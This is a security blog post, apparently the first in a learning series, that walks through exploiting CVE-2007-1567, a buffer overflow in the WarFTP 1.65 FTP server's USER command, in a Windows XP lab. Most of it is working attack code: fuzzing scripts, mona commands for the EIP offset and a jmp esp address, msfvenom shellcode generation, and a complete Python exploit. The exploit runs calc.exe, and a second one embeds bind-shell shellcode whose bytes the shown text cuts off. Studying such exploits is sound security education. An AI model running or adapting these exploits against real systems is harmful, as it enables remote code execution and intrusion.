<!DOCTYPE html><html lang="en-us" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>[Learning] CVE-2007-1567: WarFTP 1.65 - 'USER' Remote Buffer Overflow | ISSAC/iss4cf0ng's blog</title><meta name="twitter:card" content="summary_large_image"><meta name="twitter:title" content="[Learning] CVE-2007-1567: WarFTP 1.65 - 'USER' Remote Buffer Overflow | ISSAC/iss4cf0ng's blog"><meta name="twitter:image" content="/images/meme/Rio/3.png"><meta property="og:title" content="[Learning] CVE-2007-1567: WarFTP 1.65 - 'USER' Remote Buffer Overflow"><meta property="og:image" content="/images/meme/Rio/3.png"><meta property="og:url" content="https://iss4cf0ng.github.io/2026/09/08/2026-9-8-WarFTP-BOF/index.html"><link rel="icon" type="image/x-icon" href="/favicon.ico"><script>var config = {"root":"/","search":{"preload":true,"activeHolder":"Enter here","blurHolder":"Search","noResult":"Data \"$0\" not found"},"code":{"codeInfo":"$0 - $1 lines","copy":"copy","copyFinish":"copied","expand":"expand"}}</script><script src="//cdnjs.cloudflare.com/ajax/libs/mathjax/2.6.1/MathJax.js"></script><script>MathJax.Hub.Config({
 menuSettings: {
   zoom: "None"
 },
 showMathMenu: false,
 jax: ["input/TeX","output/CommonHTML"],
 extensions: ["tex2jax.js"],
 TeX: {
   extensions: ["AMSmath.js","AMSsymbols.js"],
   equationNumbers: {
     autoNumber: "AMS"
   }
 },
 tex2jax: {
   inlineMath: [["\\(", "\\)"]],
   displayMath: [["\\[", "\\]"]]
 }
});</script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/brands.min.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/fontawesome.min.css"><link rel="stylesheet" href="/css/arknights.css"><script>if (window.localStorage.getItem('theme-mode') === 'light') document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark') document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.ttf");
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
@font-face {
 font-family: 'Font Awesome 6 Brands';
 src: local('Font Awesome 6 Brands'), url('/lib/fontawesome/fa-brands.woff2') format('woff2');
}
@font-face {
 font-family: 'Font Awesome 6 Free';
 src: local('Font Awesome 6 Free'), url('/lib/fontawesome/fa-regular.woff2') format('woff2');
}</style><style>:root {
  --dark-background: url('https://ak.hypergryph.com/assets/index/images/ak/pc/bk.jpg');
  --light-background: url('/img/bk.jpg');
}</style><script async src="https://www.googletagmanager.com/gtag/js?id=G-RQ7HTMYT8W"></script><script>window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'G-RQ7HTMYT8W');</script><meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="ISSAC/iss4cf0ng's blog" type="application/atom+xml">
</head><body><div class="loading" style="opacity: 0"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><nav><div class="navBtn hide"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="Search" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li><li class="navItem"><a class="navBlock" href="/About/"><span class="navItemTitle">About</span></a></li><li class="navItem"><a class="navBlock" href="/Alien/"><span class="navItemTitle">Alien</span></a></li><li class="navItem"><a class="navBlock" href="/Arsenal/"><span class="navItemTitle">Arsenal</span></a></li><li class="navItem"><a class="navBlock" href="/2026/01/28/2026-1-28-ToolsDuplexSpy-v2-0-0/"><span class="navItemTitle">DuplexSpy</span></a></li><li class="navItem"><a class="navBlock" href="/Notes/"><span class="navItemTitle">Notes</span></a></li><li class="navItem"><a class="navBlock" href="/Series/"><span class="navItemTitle">Series</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>[Learning] CVE-2007-1567: WarFTP 1.65 - 'USER' Remote Buffer Overflow</h1><div id="post-info"><span>First Post: <div class="control"><time datetime="2026-09-08T07:04:11.000Z" id="date"> 2026-09-08</time></div></span><br><span>Last Update: <div class="control"><time datetime="2026-09-08T15:45:44.748Z" id="updated"> 2026-09-08</time></div></span><br><span>Word Count: <div class="control">3.1k</div></span><br><span>Read Time: <div class="control">19 min</div></span></div></div><hr><div id="post-content"><h1 id="Preface"><a href="#Preface" class="headerlink" title="Preface"></a>Preface</h1><p>This is the first article in my series <strong><a href="/FromBugToExploit/">“From Bug To Exploit”</a></strong>, demonstrating how to exploit a buffer overflow in WarFTP 1.65.</p>
<p>After publishing <a href="/2026/09/05/2026-9-5-OpenPetya2-0-0/">OpenPetya v2.0.0</a>, I realized my knowledge of low-level vulnerabilities is insufficient. Therefore, I decided to publish the first article in this series with a typical buffer overflow (BOF) RCE, which I had put on hold for several months for personal reasons.</p>
<blockquote>
<p>Murmur: Another reason is that I am motivated by the frequent LPE releases by MSNightmare (Nightmare Eclipse). I want to be as good as this man at vulnerability research, but I cannot improve myself by doing nothing. Therefore, I decided to start instead of just sitting around!</p>
</blockquote>
<p align="center" class='item-img' data-src='/images/meme/Rio/3.png'><img src="/images/meme/Rio/3.png" width=250/>
</p>

<h1 id="Introduction"><a href="#Introduction" class="headerlink" title="Introduction"></a>Introduction</h1><p><strong>WarFTP</strong> is a legacy, multi-threaded FTP server software for Windows developed by Jarle (“jgaa”) Aase, originally popular in the late 1990s and early 2000s.</p>
<p>The software is outdated and no longer used in modern production. However, <strong>version 1.65</strong> provides an excellent example for studying remote code execution caused by a buffer overflow!</p>
<p>In this article, I will try to apply the knowledge from <a href="">this book</a> and try to deepen my understanding of buffer overflows while learning new techniques along the way.</p>
<h1 id="Environment-Setup"><a href="#Environment-Setup" class="headerlink" title="Environment Setup"></a>Environment Setup</h1><p>To study this vulnerability, we first need to set up our experimental environment.</p>
<p>Exploit-DB is not only a platform for downloading proof-of-concept scripts, but also an excellent resource for setting up vulnerable environments. The installer for the vulnerable application is available on Exploit-DB.</p>
<p align="center" class='item-img' data-src='/images/article/2026-9-8-WarFTP-BOF/1.png'><img src="/images/article/2026-9-8-WarFTP-BOF/1.png" width=700/>
</p>

<p align="center" class='item-img' data-src='/images/article/2026-9-8-WarFTP-BOF/2.png'><img src="/images/article/2026-9-8-WarFTP-BOF/2.png" width=700/>
</p>

<p>Next, try to connect to the WarFTP server using <strong>netcat</strong>:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">nc &lt;SERVER IP&gt; 21<br></code></pre></td></tr></table></figure>
<p align="center" class='item-img' data-src='/images/article/2026-9-8-WarFTP-BOF/3.png'><img src="/images/article/2026-9-8-WarFTP-BOF/3.png" width=700/>
</p>

<p>Or write a simple Python script to test the connection:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># exploit.py</span><br><br><span class="hljs-keyword">import</span> socket<br><br>SERVER_IP = <span class="hljs-string">&#x27;192.168.235.231&#x27;</span><br>SERVER_PORT = <span class="hljs-number">21</span><br><br>s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br>s.connect((SERVER_IP, SERVER_PORT))<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Banner:&quot;</span>, s.recv(<span class="hljs-number">1024</span>).decode())<br><br>buffer = <span class="hljs-string">b&#x27;A&#x27;</span> <span class="hljs-comment"># junk data</span><br><br>payload = <span class="hljs-string">b&#x27;USER &#x27;</span> + buffer + <span class="hljs-string">b&#x27;\r\n&#x27;</span><br><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Sending WarFTPd payload...&quot;</span>)<br>s.sendall(payload)<br>s.close()<br></code></pre></td></tr></table></figure>
<p align="center" class='item-img' data-src='/images/article/2026-9-8-WarFTP-BOF/4.png'><img src="/images/article/2026-9-8-WarFTP-BOF/4.png" width=700/>
</p>

<p>At this point, we have successfully installed the WarFTP server on the virtual machine.</p>
<blockquote>
<p>Note: I chose Windows XP as the server because it provides a convenient environment for studying buffer overflows. Researchers don’t have to consider ASLR or DEP.</p>
</blockquote>
<h1 id="Buffer-Overflow"><a href="#Buffer-Overflow" class="headerlink" title="Buffer Overflow"></a>Buffer Overflow</h1><p>In this section, I am going to demonstrate how to perform a buffer overflow attack against the vulnerable server.</p>
<p>First, we need to identify which application is responsible for receiving and processing the data. We can use the command below:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">netstat -ano | findstr 21<br></code></pre></td></tr></table></figure>
<p align="center" class='item-img' data-src='/images/article/2026-9-8-WarFTP-BOF/5.png'><img src="/images/article/2026-9-8-WarFTP-BOF/5.png" width=700/>
</p>

<p>Therefore, we can determine that the application with PID <code>3328</code> (this will likely be different in your environment) is responsible for receiving data. Next, start <strong>Immunity Debugger</strong> and attach it to the process with PID <code>3328</code>:</p>
<p align="center" class='item-img' data-src='/images/article/2026-9-8-WarFTP-BOF/6.png'><img src="/images/article/2026-9-8-WarFTP-BOF/6.png" width=700/>
</p>

<blockquote>
<p>Note: One of the advantages of using a debugger to attach to the process is that crashes are inevitable during buffer overflow testing. A debugger usually provides a useful feature that allows us to restart the application immediately.</p>
</blockquote>
<p>Next, try to trigger the buffer overflow with a large amount of junk data:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># exploit.py</span><br><br><span class="hljs-keyword">import</span> socket<br><br>SERVER_IP = <span class="hljs-string">&#x27;192.168.235.231&#x27;</span><br>SERVER_PORT = <span class="hljs-number">21</span><br><br>s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br>s.connect((SERVER_IP, SERVER_PORT))<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Banner:&quot;</span>, s.recv(<span class="hljs-number">1024</span>).decode())<br><br>buffer = <span class="hljs-string">b&#x27;A&#x27;</span> * <span class="hljs-number">1000</span> <span class="hljs-comment"># junk data</span><br><br>payload = <span class="hljs-string">b&#x27;USER &#x27;</span> + buffer + <span class="hljs-string">b&#x27;\r\n&#x27;</span><br><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Sending WarFTPd payload...&quot;</span>)<br>s.sendall(payload)<br>s.close()<br></code></pre></td></tr></table></figure>
<p>Press <code>F9</code> to let Immunity Debugger continue running the application. Then, run the exploit script:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">python exploit.py<br></code></pre></td></tr></table></figure>
<p>Then, the server crashes:</p>
<p align="center" class='item-img' data-src='/images/article/2026-9-8-WarFTP-BOF/7.png'><img src="/images/article/2026-9-8-WarFTP-BOF/7.png" width=700/>
</p>

<p>A buffer overflow vulnerability does not necessarily exist just because an application crashes. However, if the junk data can overwrite the EIP (Extended Instruction Pointer), this is a strong indication that the application is vulnerable to a buffer overflow.</p>
<blockquote>
<p>Note: If a large amount of junk data crashes an application, it does not necessarily mean that the application has a buffer overflow vulnerability. However, researchers would still be happy to see it because it potentially means that something is wrong!</p>
</blockquote>
<p>At this point, we know that 1000 bytes of junk data can crash the WarFTP server application. Next, we need to find the exact offset required to precisely control the EIP.</p>
<p>We can use <strong>mona</strong> to create a special pattern to find the value.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">!mona pattern_create 1000<br></code></pre></td></tr></table></figure>
<p align="center" class='item-img' data-src='/images/article/2026-9-8-WarFTP-BOF/8.png'><img src="/images/article/2026-9-8-WarFTP-BOF/8.png" width=800/>
</p>

<p align="center" class='item-img' data-src='/images/article/2026-9-8-WarFTP-BOF/9.png'><img src="/images/article/2026-9-8-WarFTP-BOF/9.png" width=800/>
</p>

<p>Then, replace the original junk data with the pattern generated by mona and run the exploit script again:</p>
<p align="center" class='item-img' data-src='/images/article/2026-9-8-WarFTP-BOF/10.png'><img src="/images/article/2026-9-8-WarFTP-BOF/10.png" width=700/>
</p>

<p align="center" class='item-img' data-src='/images/article/2026-9-8-WarFTP-BOF/11.png'><img src="/images/article/2026-9-8-WarFTP-BOF/11.png" width=500/>
</p>

<p>Use the current value of EIP to find the exact offset:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">!mona pattern_offset 32714131<br></code></pre></td></tr></table></figure>
<p align="center" class='item-img' data-src='/images/article/2026-9-8-WarFTP-BOF/12.png'><img src="/images/article/2026-9-8-WarFTP-BOF/12.png" width=800/>
</p>

<p>Therefore, the exact offset is <code>485</code>. To demonstrate this, we can modify the exploit script as follows:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># exploit.py</span><br><br><span class="hljs-keyword">import</span> socket<br><span class="hljs-keyword">import</span> struct<br><br>SERVER_IP = <span class="hljs-string">&#x27;192.168.235.231&#x27;</span><br>SERVER_PORT = <span class="hljs-number">21</span><br><br>s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br>s.connect((SERVER_IP, SERVER_PORT))<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;[*] Banner:&quot;</span>, s.recv(<span class="hljs-number">1024</span>).decode())<br><br>junk = <span class="hljs-string">b&#x27;A&#x27;</span> * <span class="hljs-number">485</span> <span class="hljs-comment"># junk data</span><br>eip = struct.pack(<span class="hljs-string">&#x27;&lt;I&#x27;</span>, <span class="hljs-number">0xDEADBEEF</span>)<br>padding = <span class="hljs-string">b&#x27;C&#x27;</span> * <span class="hljs-number">100</span><br><br>buffer = junk + eip + padding<br><br>payload = <span class="hljs-string">b&#x27;USER &#x27;</span> + buffer + <span class="hljs-string">b&#x27;\r\n&#x27;</span><br><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;[*] Sending WarFTPd payload...&quot;</span>)<br>s.sendall(payload)<br>s.close()<br><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;[+] The payload is sent, please check.&quot;</span>)<br></code></pre></td></tr></table></figure>
<p align="center" class='item-img' data-src='/images/article/2026-9-8-WarFTP-BOF/13.png'><img src="/images/article/2026-9-8-WarFTP-BOF/13.png" width=500/>
</p>

<p>Next comes the most critical part. We need to redirect EIP to the stack and then execute the shellcode we loaded.</p>
<p>In order to do this, we need to find a <code>jmp esp</code> instruction in one of the loaded DLLs. <code>mona</code> provides a useful command to do so:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">!mona jmp -r esp<br></code></pre></td></tr></table></figure>
<blockquote>
<p>Note: You may also use <code>!mona jmp -r esp -cpb &quot;\x00&quot;</code> to exclude bad characters.</p>
</blockquote>
<p align="center" class='item-img' data-src='/images/article/2026-9-8-WarFTP-BOF/14.png'><img src="/images/article/2026-9-8-WarFTP-BOF/14.png" width=800/>
</p>

<p>Here, I chose to use <code>0x77fab277</code>. We still need shellcode to execute. We can use <strong>msfvenom</strong> (which is usually installed on Kali Linux) to generate it:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">msfvenom -p windows/exec CMD=calc.exe -b <span class="hljs-string">&quot;\x00\x0a\x0d\x09\x20\x40&quot;</span> -f python -e x86/shikata_ga_nai -i 3 -v shellcode<br></code></pre></td></tr></table></figure>
<p align="center" class='item-img' data-src='/images/article/2026-9-8-WarFTP-BOF/15.png'><img src="/images/article/2026-9-8-WarFTP-BOF/15.png" width=700/>
</p>

<p>Then, the completed exploit script is shown below:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># exploit.py</span><br><br><span class="hljs-keyword">import</span> socket<br><span class="hljs-keyword">import</span> struct<br><br>SERVER_IP = <span class="hljs-string">&#x27;192.168.235.231&#x27;</span><br>SERVER_PORT = <span class="hljs-number">21</span><br><br>s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br>s.connect((SERVER_IP, SERVER_PORT))<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;[*] Banner: &quot;</span>, s.recv(<span class="hljs-number">1024</span>).decode())<br><br>junk = <span class="hljs-string">b&#x27;A&#x27;</span> * <span class="hljs-number">485</span> <span class="hljs-comment"># junk data</span><br>eip = struct.pack(<span class="hljs-string">&#x27;&lt;I&#x27;</span>, <span class="hljs-number">0x77fab277</span>)<br>nopsled = <span class="hljs-string">b&#x27;\x90&#x27;</span> * <span class="hljs-number">32</span><br><br>int3 = <span class="hljs-string">b&#x27;\xcc&#x27;</span> <span class="hljs-comment"># INT 3</span><br><br><span class="hljs-comment"># msfvenom -p windows/exec CMD=calc.exe -b &quot;\x00\x0a\x0d\x09\x20\x40&quot; -f python -e x86/shikata_ga_nai -i 3 -v shellcode</span><br>shellcode =  <span class="hljs-string">b&quot;&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\xdb\xca\xbe\x84\xf5\xd9\x03\xd9\x74\x24\xf4&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x5f\x33\xc9\xb1\x3e\x31\x77\x1a\x83\xc7\x04&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x03\x77\x16\xe2\x71\x4d\xb2\x21\x94\xf4\x9c&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\xe6\xbf\x7d\x3b\x13\x64\x4d\x8a\x6a\xa2\x80&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x4f\x9f\xd1\xa1\x5d\x1c\x7d\x03\x6d\x8d\xed&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x38\xb9\x85\x0c\x60\x37\xab\xa3\x10\x13\xc5&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\xdf\x66\xb1\x9f\x58\xb3\xf0\xe5\x01\x0b\x97&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x55\xf6\x37\xf2\xdb\x41\x3d\xa6\x73\x56\xbb&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x83\xdf\xb4\xd9\xe6\xef\x7d\x41\x2a\xfe\x87&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x95\xfe\xba\x2f\x44\xd9\xc8\x7a\x34\x35\x59&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x57\xd1\x02\x96\x28\x8d\xe1\x2b\xfc\xdd\x12&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\xa3\x46\x6a\xa7\x87\x6b\x07\x05\xa4\x3a\xfa&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\xed\xea\xa7\x37\x1f\x1d\x8e\x34\x86\x15\x74&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\xb6\x2f\xc4\xcc\x5b\xa7\xa9\x7b\x86\xa7\x92&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x33\x30\x4f\x65\x3b\xfe\x61\xff\xb8\x3c\x86&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x86\xea\x17\xbf\x5a\x84\x56\x3b\xdf\x71\xa7&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\xb8\x90\x43\x28\x01\x66\x59\x6a\x52\x83\x6b&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x84\x29\x5d\x9d\x88\x39\xcc\x8b\xaf\xa5\xe6&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\xb4\xeb\xa5\xf2\xa3\x77\x87\x16\x54\x42\x63&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\xaf\xc0\x1f\x9a\x6f\x63\x89\x45\xbd\x45\xda&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\xf6\xfb\x46\xcd\x89\x68\xf8\x8b\x73\x9b\xf6&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\xec\x66\xcd\x1d\x68\xd5\x57\x1d\x98\xad\x93&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\xfd\x25\x21\x4c\x79\xf2\x15\x64\x1d\xf8\x6f&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\xa6\x5c\x77\x4e\x54\x08\x30\x3d\x7e\x80\x19&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x2a\xde\xef\x4e\x12\xf4\x8e\x38\xbd\x56&quot;</span><br><br>buffer = <span class="hljs-string">b&#x27;&#x27;</span><br>buffer += junk<br>buffer += eip<br>buffer += nopsled<br><span class="hljs-comment"># buffer += int3</span><br>buffer += shellcode<br><br>payload = <span class="hljs-string">b&#x27;USER &#x27;</span> + buffer + <span class="hljs-string">b&#x27;\r\n&#x27;</span><br><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;[*] Sending WarFTPd payload...&quot;</span>)<br>s.sendall(payload)<br>s.close()<br></code></pre></td></tr></table></figure>
<p align="center" class='item-img' data-src='/images/article/2026-9-8-WarFTP-BOF/16.png'><img src="/images/article/2026-9-8-WarFTP-BOF/16.png" width=700/>
</p>

<p>We can also spawn a shell to execute arbitrary commands. Since my virtual machine is configured to use a “Host-only” network, I chose to use <code>shell_bind_tcp</code>:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">msfvenom -p windows/shell_bind_tcp LPORT=4444 -b <span class="hljs-string">&quot;\x00\x0a\x0d\x09\x20\x40&quot;</span> -f python -e x86/shikata_ga_nai -i 3 -v shellcode <br></code></pre></td></tr></table></figure>
<p>Then, our exploit script can be implemented as follows:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># exploit.py</span><br><br><span class="hljs-keyword">import</span> socket<br><span class="hljs-keyword">import</span> struct<br><span class="hljs-keyword">import</span> sys<br><span class="hljs-keyword">import</span> time<br><span class="hljs-keyword">import</span> select<br><br>SERVER_IP = <span class="hljs-string">&#x27;192.168.235.231&#x27;</span><br>SERVER_PORT = <span class="hljs-number">21</span><br><br>s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br>s.connect((SERVER_IP, SERVER_PORT))<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;[*] Banner: &quot;</span>, s.recv(<span class="hljs-number">1024</span>).decode())<br><br>junk = <span class="hljs-string">b&#x27;A&#x27;</span> * <span class="hljs-number">485</span> <span class="hljs-comment"># junk data</span><br>eip = struct.pack(<span class="hljs-string">&#x27;&lt;I&#x27;</span>, <span class="hljs-number">0x77fab277</span>)<br>nopsled = <span class="hljs-string">b&#x27;\x90&#x27;</span> * <span class="hljs-number">32</span><br><br>int3 = <span class="hljs-string">b&#x27;\xcc&#x27;</span> <span class="hljs-comment"># INT 3</span><br><br><span class="hljs-comment"># shell_bind_tcp</span><br>shellcode =  <span class="hljs-string">b&quot;&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\xbb\xaf\x34\x80\xce\xdd\xc4\xd9\x74\x24\xf4&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x5e\x2b\xc9\xb1\x60\x31\x5e\x14\x03\x5e\x14&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x83\xee\xfc\x4d\xc1\x5a\x0c\x48\x5e\x7f\x65&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\xd7\x61\xc7\xa2\xa0\xc6\x0b\x64\x1f\xaf\xe8&quot;</span><br>shellcode += <span class="hljs-string">b&quot;\x9e\xa3\x61\x87\x48\x58\xea\x41\x97\x55\xef&quot;</span><br>shellcode += <span 